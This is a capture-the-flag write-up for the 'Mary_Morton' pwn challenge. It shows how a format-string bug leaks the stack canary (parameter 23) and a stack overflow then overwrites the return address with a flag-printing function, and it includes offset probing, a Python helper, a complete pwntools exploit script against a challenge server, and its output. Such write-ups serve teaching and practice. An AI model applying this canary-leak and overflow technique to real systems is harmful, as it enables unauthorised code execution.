0x01 Vulnerabilities
IDA
The bugs are laid out for you right there: one stack overflow and one format string bug, both usable.
There is a function sub_4008DA
that directly cats the flag.
checksec
kk@ubuntu:~/Desktop/black/GFSJ/Mary_Morton$ checksec Mary_Morton
[*] '/home/kk/Desktop/black/GFSJ/Mary_Morton/Mary_Morton'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
0x02 Approach
The main obstacle is that the canary is enabled, so the stack overflow cannot simply overwrite the return address.
The format string bug can be used to leak the canary value first, and then the stack overflow can overwrite past it.
See: canary - CTF Wiki
Computing the offset
Test which argument of the format string our input lands in:
kk@ubuntu:~/Desktop/black/GFSJ/Mary_Morton$ ./Mary_Morton
Welcome to the battle !
[Great Fairy] level pwned
Select your weapon
1. Stack Bufferoverflow Bug
2. Format String Bug
3. Exit the battle
2
AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
AAAA0x7ffcdd58bae00x7f0x7f3eab892260(nil)(nil)0x70257025414141410x70257025702570250x70257025702570250x70257025702570250xa7025(nil)(nil)(nil)(nil)(nil)
This confirms that our input is the 6th argument of the format string.
The offset between the canary and our input buffer is 0x90 - 8 = 0x88; in groups of eight bytes that is 0x88 / 8 = 17, so the canary is parameter 17 + 6 = 23.
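The two steps above (find which %p slot echoes the marker, then walk from the buffer to the canary slot) as an added worked example, not code from the original writeup. It assumes the "AAAA" marker, the 0x90 buffer offset and the rbp-8 canary position stated above, and uses a constructed leak line of the same shape as the transcript:

```python
import re

# Constructed sample: the line echoed for the probe "AAAA" + "%p" * 15,
# copied in shape from the transcript above.
LEAK_LINE = ("AAAA0x7ffcdd58bae00x7f0x7f3eab892260(nil)(nil)0x7025702541414141"
             "0x70257025702570250x70257025702570250x70257025702570250xa7025"
             "(nil)(nil)(nil)(nil)(nil)")

# The %p output has no separators, but every token starts with "0x" or is
# "(nil)" and hex digits never contain "x", so a non-greedy match that stops
# at the next token start splits the run unambiguously.
_TOKEN = re.compile(r"\(nil\)|0x[0-9a-f]+?(?=0x|\(nil\)|$)")


def split_leak(line, marker):
    """Strip the echoed marker and return the printed values (None for (nil))."""
    if not line.startswith(marker):
        raise ValueError("marker was not echoed at the start of the output")
    body = line[len(marker):]
    return [None if t == "(nil)" else int(t, 16) for t in _TOKEN.findall(body)]


def marker_index(values, marker):
    """1-based %p position whose low bytes hold the marker: where the buffer starts."""
    want = int.from_bytes(marker.encode(), "little")   # "AAAA" -> 0x41414141
    mask = (1 << (8 * len(marker))) - 1
    for i, v in enumerate(values, start=1):
        if v is not None and (v & mask) == want:
            return i
    raise ValueError("marker not found in the leak")


def stack_slot_index(buf_index, buf_off_from_rbp, target_off_from_rbp, slot=8):
    """%N$p index of another stack slot, from the buffer's index and the frame offsets seen in IDA."""
    distance = buf_off_from_rbp - target_off_from_rbp
    if distance % slot:
        raise ValueError("target is not slot-aligned with the buffer")
    return buf_index + distance // slot


def canary_probe_index(line=LEAK_LINE, marker="AAAA", buf_off=0x90, canary_off=8):
    """Reproduce the writeup's arithmetic: (0x90 - 8) / 8 = 17 slots past the buffer's index."""
    values = split_leak(line, marker)
    return stack_slot_index(marker_index(values, marker), buf_off, canary_off)
```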
0x03 Attack
#!/usr/bin/python
from pwn import *
io = remote('111.198.29.45', 54307)
# io = process("./Mary_Morton")
flag_addr = 0x4008DA  # sub_4008DA, which cats the flag
io.recvuntil("battle ")
io.sendline(str(2))  # option 2: format string bug
io.sendline("%23$p")  # parameter 23 is the canary (see offset calculation)
io.recvuntil("0x")
canary = int(io.recv(16), 16)
io.sendlineafter("battle ", str(1))  # option 1: stack buffer overflow
# 0x88 bytes of padding up to the canary, the leaked canary, 8 bytes of saved rbp, then the return address
payload = "a" * 0x80 + "a" * 8 + p64(canary) + "a" * 8 + p64(flag_addr)
io.sendline(payload)
io.interactive()
kk@ubuntu:~/Desktop/black/GFSJ/Mary_Morton$ python exp.py
[+] Opening connection to 111.198.29.45 on port 54307: Done
[*] Switching to interactive mode
-> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
cyberpeace{…………}
[*] Got EOF while reading in interactive
$